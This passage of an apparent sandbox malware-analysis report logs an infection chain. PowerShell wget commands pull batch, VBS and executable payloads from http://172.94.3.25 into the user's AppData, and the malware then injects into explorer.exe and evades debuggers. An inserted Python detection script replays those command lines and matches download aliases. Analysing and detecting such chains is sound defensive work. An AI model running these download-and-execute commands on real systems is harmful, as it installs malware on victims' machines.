Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime, 16_2_0040301A
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z, 16_2_00402B79
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA4748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, 17_2_6FA4748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C51748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, 18_2_6C51748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAC748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, 23_2_6FAC748E
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: noreply@vmware.com0
Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0
Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1!0
Source: DZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6vmware
Source: AUGUST.exe, 00000010.00000002.2347238226.000000000051F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0/
Source: svchost.exe, 00000015.00000002.3402164901.0000020619C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.3403620854.000002061F257000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1
Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.0
Source: C:\Users\user\DZIPR.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA53F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_6FA53F34
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow, 16_2_00406D5D
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA45D78 mov eax, dword ptr fs:[00000030h] 17_2_6FA45D78
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA45CA0 mov eax, dword ptr fs:[00000030h] 17_2_6FA45CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C515CA0 mov eax, dword ptr fs:[00000030h] 18_2_6C515CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAC5CA0 mov eax, dword ptr fs:[00000030h] 23_2_6FAC5CA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA53F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_6FA53F34
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA5CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_6FA5CE5C
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA58034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_6FA58034
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C52CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_6C52CE5C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C523F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_6C523F34
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C528034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_6C528034
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAD3F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 23_2_6FAD3F34
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FADCE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_6FADCE5C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAD8034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 23_2_6FAD8034

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\DZIPR.exe NtQuerySystemInformation: Direct from: 0x6FA466A2
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe NtProtectVirtualMemory: Direct from: 0x6FB2E812
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe NtProtectVirtualMemory: Direct from: 0x6FB32B7A
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe NtProtectVirtualMemory: Direct from: 0x6C582A72
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe NtQuerySystemInformation: Direct from: 0x6C5166A2
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe NtQuerySystemInformation: Direct from: 0x6FAC66A2
Source: C:\Users\user\DZIPR.exe NtProtectVirtualMemory: Direct from: 0x77377B2E
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 1460 base: 8F79C0 value: 55
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 1460 base: 400000 value: 00
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 5388 base: 8F79C0 value: 55
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 5388 base: 400000 value: 00
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 4924 base: 8F79C0 value: 55
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 4924 base: 400000 value: 00
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 8F79C0
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 400000
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 8F79C0
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 400000
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 8F79C0
Source: C:\Windows\SysWOW64\cmd.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 400000
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c C:\Users\user\AppData\Roaming/hi.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\AUGUST.exe C:\Users\user\AppData\Roaming/AUGUST.exe
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Process created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe"
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
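The creation chain above (cmd.exe, then powershell wget from http://172.94.3.25 into AppData\Roaming, then wscript.exe running hi.vbs, cmd.exe running ffo.bat, AUGUST.exe, DZIPR.exe, SysWOW64\cmd.exe and finally SysWOW64\explorer.exe), together with the section mappings and memory writes into explorer.exe listed just before it, is the material a detection engineer turns into rules. The Python below is an added example and is not part of the Joe Sandbox report or of the sample: it replays those observations as constructed telemetry records (the record layout, the rule names and the benign control event are assumptions made for the example) and reports which stage each record trips. Note that wget, iwr and curl are PowerShell aliases of Invoke-WebRequest, so a rule written for the cmdlet name alone misses exactly these command lines.

```python
"""Added detection example (not part of the Joe Sandbox report): replay the
process-creation and cross-process memory observations listed above as
constructed telemetry and flag the stages a detection rule would alert on."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str          # "proc" (process created), "section" (section mapped), "memwrite"
    actor: str         # image path of the process performing the action
    target: str        # created image (proc) or image of the written/mapped process
    cmdline: str = ""  # command line of the created process (proc only)
    base: int = 0      # destination address (memwrite only)


# Constructed records mirroring the report's observations; not a real event log.
EVENTS = [
    Event("proc", r"C:\Windows\System32\cmd.exe",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs"),
    Event("proc", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wscript.exe",
          r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs"'),
    Event("proc", r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\cmd.exe",
          r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "'),
    Event("proc", r"C:\Windows\System32\cmd.exe",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe"),
    Event("proc", r"C:\Windows\System32\cmd.exe", r"C:\Users\user\AppData\Roaming\AUGUST.exe",
          r"C:\Users\user\AppData\Roaming/AUGUST.exe"),
    Event("proc", r"C:\Users\user\AppData\Roaming\AUGUST.exe", r"C:\Users\user\DZIPR.exe",
          r'"C:\Users\user\DZIPR.exe"'),
    Event("proc", r"C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe",
          r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\cmd.exe"),
    Event("section", r"C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe",
          r"C:\Windows\SysWOW64\cmd.exe"),
    Event("proc", r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\explorer.exe",
          r"C:\Windows\SysWOW64\explorer.exe"),
    Event("section", r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\explorer.exe"),
    Event("memwrite", r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\explorer.exe",
          base=0x400000),
    Event("memwrite", r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\explorer.exe",
          base=0x8F79C0),
    # Benign control (constructed): a user opening a console from the desktop shell.
    Event("proc", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe"),
]

# PowerShell download cmdlet (wget/iwr/curl are aliases of Invoke-WebRequest) with -OutFile.
DOWNLOAD_RE = re.compile(
    r"\b(?:wget|iwr|curl|Invoke-WebRequest)\b.*?(https?://\S+).*?-OutFile\s+(\S+)", re.I)
USER_PROFILE_RE = re.compile(r"^C:\\Users\\[^\\]+\\", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
DEFAULT_IMAGE_BASE_X86 = 0x400000  # linker default image base of a 32-bit PE


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check(ev):
    """Yield (rule, detail) pairs for one event."""
    actor, target = basename(ev.actor), basename(ev.target)
    if ev.kind == "proc":
        m = DOWNLOAD_RE.search(ev.cmdline)
        if m and target == "powershell.exe":
            out = m.group(2).replace("/", "\\")
            if USER_PROFILE_RE.match(out):
                yield "download_to_user_profile", f"{m.group(1)} -> {out}"
        if actor in SCRIPT_HOSTS and target in SHELLS:
            yield "script_host_spawns_shell", f"{actor} -> {ev.cmdline}"
        if USER_PROFILE_RE.match(ev.target) and target.endswith(".exe"):
            yield "execution_from_user_dir", ev.target
        if actor == "cmd.exe" and target == "explorer.exe":
            # explorer.exe is normally started by userinit.exe at logon, not by a shell
            yield "shell_spawns_explorer", f"{ev.actor} -> {ev.target}"
    elif ev.kind in ("section", "memwrite") and ev.actor != ev.target:
        yield "cross_process_write", f"{actor} {ev.kind} -> {target}"
        if ev.kind == "memwrite" and ev.base == DEFAULT_IMAGE_BASE_X86:
            # a write at another process's default image base means a replacement
            # PE is being staged there (hollowing / manual mapping)
            yield "write_at_image_base", f"{actor} -> {target} @ {ev.base:#x}"


def analyze(events):
    return [finding for ev in events for finding in check(ev)]


def rules_hit(findings):
    return sorted({rule for rule, _ in findings})


if __name__ == "__main__":
    for rule, detail in analyze(EVENTS):
        print(f"{rule:28} {detail}")
```

Run it directly to print one finding per stage. On real telemetry the same checks apply once the fields are mapped: Sysmon event 1 for the creations, and ProcessAccess (event 10) or EDR memory-write telemetry for the mappings and writes. The write at 0x400000 is the strongest single signal in the chain: a legitimate explorer.exe has no reason to receive a write at a PE default image base from cmd.exe, and the later Yara hits on the unpacked explorer.exe memory are what that write staged.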
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_0040D72E cpuid 16_2_0040D72E
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar, 16_2_00401F9D
Source: C:\Users\user\DZIPR.exe Code function: GetLocaleInfoA, 17_2_6FA64DBC
Source: C:\Users\user\DZIPR.exe Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW, 17_2_6FA489B5
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: GetLocaleInfoA, 18_2_6C534DBC
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW, 18_2_6C5189B5
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: GetLocaleInfoA, 23_2_6FAE4DBC
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW, 23_2_6FAC89B5
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
